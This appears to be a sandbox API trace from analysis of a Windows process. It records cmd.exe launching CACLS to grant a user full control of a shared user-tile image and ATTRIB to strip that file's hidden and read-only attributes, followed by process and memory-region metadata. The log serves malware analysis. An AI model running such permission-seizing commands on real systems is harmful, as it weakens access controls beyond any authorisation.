[0185.841] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0185.841] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f548 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.841] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f548, lpFilePart=0x26f544 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f544*="Desktop") returned 0x18 [0185.841] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0185.841] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f2c4 | out: lpFindFileData=0x26f2c4) returned 0x3a0ae8 [0185.841] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0185.841] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f2c4 | out: lpFindFileData=0x26f2c4) returned 0x3a0ae8 [0185.841] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0185.841] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f2c4 | out: lpFindFileData=0x26f2c4) returned 0x3a0ae8 [0185.841] FindClose (in: hFindFile=0x3a0ae8 | out: hFindFile=0x3a0ae8) returned 1 [0185.842] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0185.842] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0185.842] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0185.842] GetEnvironmentStringsW () returned 0x3a0308* [0185.842] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0185.842] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.842] GetConsoleOutputCP () returned 0x1b5 [0185.842] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) 
returned 1 [0185.842] GetUserDefaultLCID () returned 0x409 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f688, cchData=128 | out: lpLCData="0") returned 2 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f688, cchData=128 | out: lpLCData="0") returned 2 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f688, cchData=128 | out: lpLCData="1") returned 2 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0185.843] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0185.843] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0185.844] GetConsoleTitleW (in: lpConsoleTitle=0x3909b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0185.844] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0185.844] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0185.844] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0185.844] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0185.845] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0185.845] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0185.845] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0185.845] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0185.845] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0185.845] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0185.845] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0185.845] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0185.848] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0185.848] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0185.848] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0185.848] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0185.848] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0185.848] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0185.848] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0185.850] GetConsoleTitleW (in: lpConsoleTitle=0x26f31c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.850] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0185.850] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0185.850] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0185.850] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0185.850] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0185.851] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 
[0185.851] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0185.851] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0185.851] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0185.851] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0185.851] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0185.851] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0185.851] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0185.851] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0185.851] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0185.851] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0185.851] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0185.851] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0185.851] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0185.851] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0185.851] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0185.851] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0185.851] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0185.851] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0185.851] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0185.851] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0185.851] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0185.851] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0185.851] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0185.851] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0185.851] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0185.851] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0185.851] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0185.851] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0185.851] _wcsicmp (_String1="CACLS", _String2="MOVE") 
returned -10 [0185.851] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0185.851] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0185.851] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0185.851] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0185.851] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0185.851] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0185.851] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0185.851] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0185.851] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0185.851] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0185.851] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0185.851] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0185.851] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0185.851] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0185.851] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0185.852] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0185.852] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0185.852] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0185.852] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0185.852] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0185.852] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0185.852] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0185.852] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0185.859] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0185.859] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0185.859] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0185.859] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0185.859] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0185.859] _wcsicmp (_String1="CACLS", _String2="SHIFT") 
returned -16 [0185.859] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0185.859] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0185.859] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0185.859] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0185.859] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0185.859] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0185.859] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0185.859] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0185.859] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0185.859] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0185.859] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0185.859] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0185.859] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0185.859] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0185.859] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0185.859] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0185.859] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0185.859] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0185.859] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0185.860] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0185.860] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0185.860] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0185.860] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0185.860] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0185.860] SetErrorMode (uMode=0x0) returned 0x0 [0185.860] SetErrorMode (uMode=0x1) returned 0x0 [0185.860] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a1e98, lpFilePart=0x26ee3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26ee3c*="Desktop") returned 0x18 [0185.860] 
SetErrorMode (uMode=0x0) returned 0x1 [0185.860] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.860] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.865] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.866] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0xffffffff [0185.866] GetLastError () returned 0x2 [0185.866] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0xffffffff [0185.866] GetLastError () returned 0x2 [0185.866] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0x3a2180 [0185.866] FindClose (in: hFindFile=0x3a2180 | out: hFindFile=0x3a2180) returned 1 [0185.866] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0xffffffff [0185.867] GetLastError () returned 0x2 [0185.867] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0x3a2180 [0185.867] FindClose (in: hFindFile=0x3a2180 | out: hFindFile=0x3a2180) returned 1 [0185.867] _wcsicmp 
(_String1=".EXE", _String2=".BAT") returned 3 [0185.867] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0185.867] GetConsoleTitleW (in: lpConsoleTitle=0x26f0b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.868] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f000 | out: lpAttributeList=0x26ef38, lpSize=0x26f000) returned 1 [0185.868] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef38, dwFlags=0x0, Attribute=0x60001, lpValue=0x26eff8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef38, lpPreviousValue=0x0) returned 1 [0185.868] GetStartupInfoW (in: lpStartupInfo=0x26eef4 | out: lpStartupInfo=0x26eef4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0185.868] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.869] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26ef94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26efe0 
| out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x26efe0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xff4, dwThreadId=0xeec)) returned 1 [0185.871] CloseHandle (hObject=0x4c) returned 1 [0185.871] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0185.871] GetEnvironmentStringsW () returned 0x3a0308* [0185.871] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0185.871] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0185.906] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26eed4 | out: lpExitCode=0x26eed4*=0x0) returned 1 [0185.906] CloseHandle (hObject=0x50) returned 1 [0185.906] _vsnwprintf (in: _Buffer=0x26f01c, _BufferCount=0x13, _Format="%08X", _ArgList=0x26eee0 | out: _Buffer="00000000") returned 8 [0185.906] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.906] GetEnvironmentStringsW () returned 0x3a2410* [0185.906] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0185.906] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.906] GetEnvironmentStringsW () returned 0x3a2410* [0185.906] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0185.906] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ef38 | out: lpAttributeList=0x26ef38) [0185.906] GetConsoleTitleW (in: lpConsoleTitle=0x26f31c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.906] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.906] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.908] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.908] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0xffffffff [0185.908] GetLastError () returned 0x2 [0185.908] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0xffffffff [0185.908] GetLastError () returned 0x2 [0185.908] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0x39e4d8 [0185.909] FindClose (in: hFindFile=0x39e4d8 | out: hFindFile=0x39e4d8) returned 1 [0185.909] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0xffffffff [0185.909] GetLastError () returned 0x2 [0185.909] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ebb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebb8) returned 0x39e4d8 [0185.909] FindClose (in: hFindFile=0x39e4d8 | out: hFindFile=0x39e4d8) returned 1 [0185.909] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0185.909] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0185.909] GetConsoleTitleW (in: lpConsoleTitle=0x26f0b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.909] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f000 | out: lpAttributeList=0x26ef38, lpSize=0x26f000) returned 1 
[0185.909] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef38, dwFlags=0x0, Attribute=0x60001, lpValue=0x26eff8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef38, lpPreviousValue=0x0) returned 1 [0185.909] GetStartupInfoW (in: lpStartupInfo=0x26eef4 | out: lpStartupInfo=0x26eef4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0185.909] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.909] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26ef94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26efe0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"", lpProcessInformation=0x26efe0*(hProcess=0x4c, hThread=0x50, dwProcessId=0x8a4, dwThreadId=0x8b0)) returned 1 [0185.911] CloseHandle (hObject=0x50) returned 1 [0185.911] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0185.911] GetEnvironmentStringsW () returned 0x3a2410* [0185.911] 
FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0185.911] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0185.953] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x26eed4 | out: lpExitCode=0x26eed4*=0x0) returned 1 [0185.953] CloseHandle (hObject=0x4c) returned 1 [0185.953] _vsnwprintf (in: _Buffer=0x26f01c, _BufferCount=0x13, _Format="%08X", _ArgList=0x26eee0 | out: _Buffer="00000000") returned 8 [0185.953] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.953] GetEnvironmentStringsW () returned 0x3a2410* [0185.953] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0185.953] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.953] GetEnvironmentStringsW () returned 0x3a2410* [0185.954] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0185.954] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ef38 | out: lpAttributeList=0x26ef38) [0185.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.954] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0185.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.954] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0185.954] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.954] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0185.954] SetConsoleInputExeNameW () returned 0x1 [0185.954] GetConsoleOutputCP () returned 0x1b5 [0185.954] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.954] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.954] exit (_Code=0) Process: id = "377" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0xff4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "376" os_parent_pid = "0xe9c" cmd_line = "CACLS \"C:\\Users\\All 
Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26570 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26571 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 26572 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 26573 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 26574 start_va = 0xcf0000 end_va = 0xcf8fff entry_point = 0xcf0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26575 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26576 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26577 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" 
